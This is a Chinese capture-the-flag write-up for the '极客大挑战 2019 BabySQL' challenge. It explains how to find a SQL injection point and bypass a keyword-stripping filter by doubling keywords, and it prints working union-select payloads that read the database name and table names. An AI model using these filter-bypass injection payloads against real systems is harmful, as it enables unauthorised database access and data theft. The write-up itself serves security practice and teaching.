[极客大挑战 2019]BabySQL 1

Brucye2026-03-12 18:03

[极客大挑战 2019]BabySQL 1

文章目录

题目预览

基本测试

这里包数据包放到Burp的Repeater中继续进行

单引号测试报错,#号闭合回显,说明有SQL注入点

注意:这里面的空格用+号替换

查列数

回显发现过滤了or,by,回显中留下了der,判断是用replace替换过滤,后面用双写绕过

双写后继续测试

最后测试完是3列

测数据库

后续测试中过滤什么,就双写什么

sql 复制代码 
ununionion+seselectlect+1,2,database()%23

测试到数据库是geek

测数据表

sql 复制代码 
ununionion+seselectlect+1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23

测数据字段

测字段值

完结~

相关推荐
XLYcmy6 分钟前
2026游戏安全技术竞赛-PC客户端安全-初赛 求解起点到终点的最短路径
windows·python·网络安全·dfs·bfs·游戏安全·曼哈顿距离
谪星·阿凯23 分钟前
电商系统Web渗透测试实战指南
前端·网络·安全·web安全·网络安全
禹凕36 分钟前
MYSQL——基础知识(SQL的临时表和克隆表)
sql·mysql
汤愈韬1 小时前
防火墙双机热备
网络协议·网络安全·security
空空潍2 小时前
MySQL索引不生效?一文理解CBO成本模型
数据库·sql·mysql
IRevers2 小时前
【Agent】基于Langchain的Agent数据库查询助手
数据库·人工智能·pytorch·sql·深度学习·langchain·agent
他是龙5512 小时前
DVWA SQL 注入全级别通关笔记(Low / Medium / High / Impossible)
数据库·笔记·sql
深邃-2 小时前
【Web安全】-Kali,Linux配置(1):Kali网络配置,LinuxEnvConfig配置脚本,APT源的讲解,Kali设置中文
linux·运维·开发语言·网络·安全·web安全·网络安全
不会编程的崽2 小时前
0CTF piapiapia PHP反序列化+字符串逃逸
安全·web安全·网络安全·php
treacle田2 小时前
达梦数据库-快速装载工具dmfldr-记录总结
数据库·sql·达梦快速装载dmfldr
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI前瞻:量子AI、具身智能与科学发现的新纪元052026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元06codex app每次打开重连5次Reconnecting问题解决07AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析082026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot09DeepSeek V4 全面解析:测评、对比、案例及实操指南102026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析